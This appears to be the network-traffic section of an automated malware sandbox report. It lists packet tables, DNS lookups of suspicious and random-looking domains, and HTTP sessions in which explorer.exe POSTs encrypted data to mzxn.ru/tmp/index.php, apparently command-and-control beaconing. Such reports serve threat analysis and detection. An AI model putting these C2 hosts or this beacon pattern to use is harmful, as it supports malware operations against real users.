Jul 27, 2024 08:56:54.651391029 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:54.651401997 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:54.651453972 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:54.651463032 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:54.651784897 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:54.651938915 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:54.651966095 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:55.903820038 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:55.904010057 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:55.904314041 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:55.918138027 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:55.918138981 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:55.918204069 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:55.918239117 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:56.021229029 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:56.021323919 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:56.021441936 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:56.021862984 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:56.021897078 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:56.625608921 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:56.625695944 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:56.627840042 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:56.627871037 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:56.627940893 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:56.627952099 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:56.628242016 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:56.628380060 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:56.672537088 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:57.858386040 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:57.858527899 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:57.858720064 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:57.877609015 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:57.877609015 CEST	50832	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:57.877680063 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:57.877715111 CEST	443	50832	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:57.989967108 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:57.990047932 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:57.990127087 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:57.990628004 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:57.990662098 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:58.647941113 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:58.648123026 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:58.650392056 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:58.650445938 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:58.650521040 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:58.650533915 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:58.651245117 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:58.652601957 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:58.696537018 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:59.661201000 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:59.662230015 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:59.662424088 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:59.676094055 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:59.676094055 CEST	50833	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:59.676158905 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:59.676197052 CEST	443	50833	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:59.786870003 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:59.786958933 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:59.787055969 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:59.787394047 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:59.787420034 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:00.391237020 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:00.391350031 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:57:00.393480062 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:57:00.393515110 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:00.393599033 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:57:00.393610954 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:00.393997908 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:00.394140959 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:57:00.440510035 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:01.739958048 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:01.740118980 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:01.740227938 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:57:01.763494015 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:57:01.763531923 CEST	443	50834	107.173.160.137	192.168.2.4
Jul 27, 2024 08:57:01.763550043 CEST	50834	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:57:01.763559103 CEST	443	50834	107.173.160.137	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 08:53:20.124408960 CEST	52159	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:53:21.118078947 CEST	52159	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:53:21.125272989 CEST	53	52159	1.1.1.1	192.168.2.4
Jul 27, 2024 08:53:22.494399071 CEST	53	52159	1.1.1.1	192.168.2.4
Jul 27, 2024 08:54:07.535334110 CEST	52769	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:54:07.557096958 CEST	53	52769	1.1.1.1	192.168.2.4
Jul 27, 2024 08:54:21.521735907 CEST	65092	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:54:21.540000916 CEST	53	65092	1.1.1.1	192.168.2.4
Jul 27, 2024 08:54:29.692822933 CEST	60712	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:54:29.709892988 CEST	53	60712	1.1.1.1	192.168.2.4
Jul 27, 2024 08:54:30.131011009 CEST	51421	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:54:30.138420105 CEST	53	51421	1.1.1.1	192.168.2.4
Jul 27, 2024 08:54:33.290199041 CEST	59907	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:54:33.298206091 CEST	53	59907	1.1.1.1	192.168.2.4
Jul 27, 2024 08:54:42.365744114 CEST	59197	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:54:42.378727913 CEST	53	59197	1.1.1.1	192.168.2.4
Jul 27, 2024 08:56:01.862447977 CEST	55150	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:56:02.853996038 CEST	55150	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:56:03.949840069 CEST	55150	53	192.168.2.4	1.1.1.1
Jul 27, 2024 08:56:04.361144066 CEST	53	55150	1.1.1.1	192.168.2.4
Jul 27, 2024 08:56:04.361183882 CEST	53	55150	1.1.1.1	192.168.2.4
Jul 27, 2024 08:56:04.361212969 CEST	53	55150	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 08:53:20.124408960 CEST	192.168.2.4	1.1.1.1	0xfcc	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:21.118078947 CEST	192.168.2.4	1.1.1.1	0xfcc	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:07.535334110 CEST	192.168.2.4	1.1.1.1	0xbb86	Standard query (0)	mussangroup.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:21.521735907 CEST	192.168.2.4	1.1.1.1	0x18e	Standard query (0)	funrecipebooks.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:29.692822933 CEST	192.168.2.4	1.1.1.1	0x4348	Standard query (0)	callosallsaospz.shop	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:30.131011009 CEST	192.168.2.4	1.1.1.1	0xbead	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:33.290199041 CEST	192.168.2.4	1.1.1.1	0x55f	Standard query (0)	store4.gofile.io	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:42.365744114 CEST	192.168.2.4	1.1.1.1	0x4cf7	Standard query (0)	liernessfornicsa.shop	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:01.862447977 CEST	192.168.2.4	1.1.1.1	0xc9da	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:02.853996038 CEST	192.168.2.4	1.1.1.1	0xc9da	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:03.949840069 CEST	192.168.2.4	1.1.1.1	0xc9da	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	187.211.163.180	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:53:22.494399071 CEST	1.1.1.1	192.168.2.4	0xfcc	No error (0)	mzxn.ru	186.233.231.45	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:07.557096958 CEST	1.1.1.1	192.168.2.4	0xbb86	No error (0)	mussangroup.com	185.149.100.242	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:21.540000916 CEST	1.1.1.1	192.168.2.4	0x18e	No error (0)	funrecipebooks.com	162.0.235.84	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:29.709892988 CEST	1.1.1.1	192.168.2.4	0x4348	No error (0)	callosallsaospz.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:29.709892988 CEST	1.1.1.1	192.168.2.4	0x4348	No error (0)	callosallsaospz.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:30.138420105 CEST	1.1.1.1	192.168.2.4	0xbead	No error (0)	rentry.co	104.26.2.16	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:30.138420105 CEST	1.1.1.1	192.168.2.4	0xbead	No error (0)	rentry.co	104.26.3.16	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:30.138420105 CEST	1.1.1.1	192.168.2.4	0xbead	No error (0)	rentry.co	172.67.75.40	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:33.298206091 CEST	1.1.1.1	192.168.2.4	0x55f	No error (0)	store4.gofile.io	31.14.70.245	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:42.378727913 CEST	1.1.1.1	192.168.2.4	0x4cf7	No error (0)	liernessfornicsa.shop	172.67.213.85	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:54:42.378727913 CEST	1.1.1.1	192.168.2.4	0x4cf7	No error (0)	liernessfornicsa.shop	104.21.77.246	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	187.211.163.180	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	186.233.231.45	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361144066 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	187.211.163.180	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	186.233.231.45	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361183882 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	187.211.163.180	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	186.233.231.45	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 27, 2024 08:56:04.361212969 CEST	1.1.1.1	192.168.2.4	0xc9da	No error (0)	mzxn.ru	196.189.156.245	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mussangroup.com

167.235.128.153

107.173.160.137

107.173.160.139

funrecipebooks.com

callosallsaospz.shop

rentry.co

store4.gofile.io

liernessfornicsa.shop

ntsgigbhjmdewium.org

mzxn.ru

xxoccdqcbwgkfun.com

brsvjaqkplqcgpbh.com

micjtprwldhqig.org

nsmonxwrtdtb.com

jcdtuefeynnuyume.com

jmeyyrwebcswyji.org

csqyjswelakff.org

77.221.157.163

uiqytnopuefi.org

sqybtthvvjvcy.net

uancqnbiphxqrd.net

voprlhobiib.net

ychtpaufegv.org

64.190.113.113

kabrxolnvhyrwjnc.net

dbnuufytckctj.net

alsfxtrkgnqwrtmu.net

jhgsrssviwperqc.net

qtugjgfklgqqb.net

lgvneckioyenslmr.org

hqtvwjoqbrnqlnm.net

oumdrdjjbggqm.com

gwdkbhdjbqj.com

njjerjslsvwgqvn.net

109.172.114.212

uhrlndgkepvaqel.net

jpegpuimxnr.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	50676	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:25.025940895 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ntsgigbhjmdewium.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: mzxn.ru
Jul 27, 2024 08:53:25.025964975 CEST	204	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 33 cf 97 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA .[k,vur3QHbP7EICkHoFwxJS7H+S1"Nb~<rKGL]jm;#
Jul 27, 2024 08:53:26.227835894 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	50677	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:26.238071918 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xxoccdqcbwgkfun.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: mzxn.ru
Jul 27, 2024 08:53:26.238071918 CEST	316	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 3d 53 af f7 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vu=St*TjyJuGXf(/\9R&3KpIiSu`=!Y1 ~aBQ?HGIknOm:(8Mb7;F(
Jul 27, 2024 08:53:27.443131924 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	50678	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:27.452153921 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://brsvjaqkplqcgpbh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: mzxn.ru
Jul 27, 2024 08:53:27.452153921 CEST	345	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 54 39 e9 e6 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuT9xpjvq2Yt>a7udj64c/OmQ9pqU O\_9FC&E3ik%<U]4\|1H
Jul 27, 2024 08:53:28.638678074 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50679	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:28.647154093 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://micjtprwldhqig.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 361 Host: mzxn.ru
Jul 27, 2024 08:53:28.647170067 CEST	361	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 79 28 ca 98 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuy(O6NbY{:VT/T,b;Szm5?Z@jSfw(D]U2vR167!qv^)MRvW4<)
